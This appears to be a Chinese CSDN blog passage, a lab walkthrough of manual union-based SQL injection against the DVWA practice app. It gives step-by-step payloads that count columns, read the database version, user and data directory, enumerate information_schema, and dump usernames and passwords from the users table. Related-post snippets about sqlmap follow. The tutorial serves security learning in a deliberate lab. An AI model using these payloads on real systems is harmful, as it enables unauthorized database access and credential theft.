MySQL注入试用_DVWA亲测SQL注入漏洞

最新推荐文章于 2022-11-21 20:54:02 发布
最新推荐文章于 2022-11-21 20:54:02 发布
阅读量128 收藏
点赞数
文章标签: MySQL注入试用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30632267/article/details/113380289
版权

当然,我们也可以使用注释来注释后面的单引号

sql中注释 单行可以使用 #(忽略) --(忽略),多行使用//

我们试试1' #

e76c8e8193b52e73d703c7bffe76684e.png

下面我们来利用漏洞获取数据库信息

大概步骤就是:

1.猜解所查询的字段数目

2.获取字段显示位

3.通过显示位获取数据库信息

4.获取数据库中的表名

5.获取表中的列名(字段)

6.导出数据库中的数据

7.验证导出数据的有效性

猜解所查询的字段数

方式1: order by num

若num数值超过了字段数,则查询会报错,从而判断出select语句所查询字段的数目

输入:

1' order by 2 #

775661dfa65696b65771c0d0bd37b22d.png

1' order by 3 #

ba3f3d37f65a30056a8344c990fa732b.png

报错,说明数据表中只有两个字段

方式二:union select 1,2,3...

若union select后的数字位(不一定是1/2/3,只要有数字占位即可)与实际查询的字段位不完全对应时,查询就会报错,直至调整到不报错时的占位个数,从而判断实际查询的字段数

输入:union select 1,2 #

7dab7b2fd5163f89009bf5393877ddb4.png

输入:union select 1,2.3 #

e0ab413274738a3c4d8051bdb422dbd5.png

获取字段的显示位

1' union select 1,2 #

4100b3041ec7066b5d61af4faebe338f.png

既然显示位显示的是我们设定数值,那么我们就通过显示位获取数据,输出出来

通过显示位获取数据库信息

此处会用到Mysql注入常用的一些函数,可参看此文==>SQL注入常用的内置函数整理(以MySql为例)

获取当前连接的数据库名称、DBMS的版本(Mysql的版本)

1' union select database(),version() #

f3e781db84d714a25070f9a260b89aff.png

获取当前连接数据库的用户

1' union select 1,user() #

ec2766aa875e4b16a1c182e05f2e2eb3.png

获取服务器的操作系统、数据库的存储目录

1' union select @@version_compile_os,@@datadir #

0f03dbf49954079145a112fd4f235c35.png

获取数据库中所有数据库名

在此之前,科普一下数据库的知识

mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息

information_schema.schemata 记录所有的数据库名称

Information_schema.tables: 记录表名信息的表(也有数据库名字段)

Information_schema.columns: 记录列名信息的表(数据库名、表名、字段名)

1' union select 1,schema_name from information_schema.schemata # 可能是权限问题,没有全部爆出来

e0e2f3c22fdc6499201c1deb6fcb2123.png

去数据库执行是这样的

d85f70b18bda21f2d52706fb44b94304.png

我们发现数据库dvwa正是我们想要的,因此,通过此数据库,去爆表

获取当前连接数据库(dvwa)中的所有表

1' union select 1,table_name from information_schema.tables where table_schema="dvwa" #

where .. 后面表示的限制的条件,只查数据库名是dvwa的表

5495bd657e324bd0f0cc175ebe508c69.png

获取表中的列名(字段)

1' union select 1,column_name from information_schema.columns where table_name="users" #

60cb745a8a07fc35e03f21f250495cf9.png

这样输出有点乱,我们使用group_concat()将他们简单的输出出来

1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #

b38c3b3a23c403af2e3b011f2730ba95.png

如果你觉得有点挤,看的不舒服的话,你可以

1' union select 1,group_concat(column_name,' ') from information_schema.columns where table_name="users" #

4cce93587ab3ca1df56f64fb67e6ac16.png

这样是不是就明显多了?关于group_concat(),还有concat()可以自行百度学习

知道了数据库的表名、字段名就可以爆表了

爆表

1' union select 1,concat(user,'--',password) from users #

843f48e3c372738a70a4cc199453b29a.png

还有其他更多的导出操作,一些导出函数的使用,可以自行尝试

验证导出数据的有效性

eed1805ef43f834158660925a84e092e.png

OK!!

Medium

只是闭合方式不同

4b5a0e86501e1685327237a657a19839.png

其余操作步骤与上差不多

high

a844ad064d0117339203295269545852.png

想办法闭合,其他就自然好起来了!

腾讯天美工作室群
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA设置mysql_SQL注入之DVWA平台mysql注入
weixin_30998047的博客
01-19 410
今天主要针对mysql常用注入语句进行试。试环境与工具:试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。***工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103首先我们介绍下DVWA和Burpsuite,...
DVWA mysql 注入( low)
m0_65096687的博客
10-24 279
mysql注入的原理简单来说就是将页面的语句闭合掉,然后输入自己想执行的语句,语句会通过数据库进行查询,然后返回到页面low看传入的参数id是由 ' 包裹着,所以我们需要使用 ' 将第一个单引号给注释点,然后传入我们想要查询的语句,最后将第三个单引号给注释,来使数据库成功执行我们的查询语句。这个地方困扰了我好久输入' 会报错,因为没有闭合。所以判断出他是' 闭合的字符类型注入,我们只需要注释' 即可。正确的做法是。
dvwa批量mysql注入脚本_【DVWA】SQL注入
weixin_33016287的博客
02-15 117
0x01 LowSQL Injection最简单的注入,没有任何过滤,常规语句注入即可:11'1'#1' union select 1,2 #0' union select database(),2 #0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'...
mysql注入dvwa_DVWA学习之SQL注入
weixin_33739591的博客
02-06 141
DVWA学习之SQL注入环境工具dvwa 1.9phpstudyfirefoxburpsuite实验步骤一、设置安全级别为LOW1. 登录DVWA,并将安全级别设置为LOW2. 进入SQL注入模块,并输入1,返回结果如下3. 下面判断注入类型是字符型注入还是整数型注入字符型注入SQL语句形如select * from xx where id='$id'整数型注入SQL语句形如select * ...
对DVWA进行SQL注入
Jo_kong的博客
10-02 4766
我用的是在VMware下的虚拟机,在这就不说安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到各大软件的官网上去下载)我用的系统如下: kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用...
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
sql注入渗透试工具:sqlol/DVWA
04-24
sql注入渗透试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
DVWA下的SQL注入
07-25
SQL
网络渗透试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检的WEB脆弱性试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
SQL注入之DVWA平台mysql注入
weixin_33700350的博客
07-19 94
今天主要针对mysql常用注入语句进行试。试环境与工具:试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。***工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103 首先我们介绍下...
DVWA之php+mysql手工注入
孤的博客
10-17 348
DVWA 页面 输入user ID ,输入 1。看到如下信息 在此点尝试注入,输入‘ ’ ’,判断其注入类型。 初步判断是数字型注入,在输入 " 1 or 1=1 ",尝试遍历数据表 判断字符型:" 1’ or ‘1’='1 " 利用 order by num 来试查询表的列, 输入: " 1’ order by 1 – &amp
SQL注入部分:DVWA+SQLmap+Mysql注入实战
AZXYZNPY的博客
11-21 673
(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。注意:应当在第一个页面就点检查,而不是点击检查源代码之后再点击检查,然后就能获得cookie值,而且每次实验的值都不一样,因此做实验最好一次做完。7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用的数据库名称和用户名。5、枚举数据库和指定数据库的数据表。--dbs:枚举当前数据库。-T:指定数据库中的数据表。
网络渗透试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
最新发布
zzzfff__的博客
11-21 1746
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入SQL注入的分类 根据SQL数据类型分类 整型注...
DVWA-SQL注入
qq_60848021的博客
06-25 1146
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9347
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
SQL注入的环境搭建与简单操作
qq_51627527的博客
12-16 653
SQL注入:DVWA+SQLmap+Mysql注入实战 实验环境搭建。启动Metasploitable2虚拟机。
e-1-6-通过sqlnamp检sql注入漏洞-随堂笔记 .doc
10-23
“通过sqlnamp检sql注入漏洞的随堂笔记,包括安装SQLmap和DVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值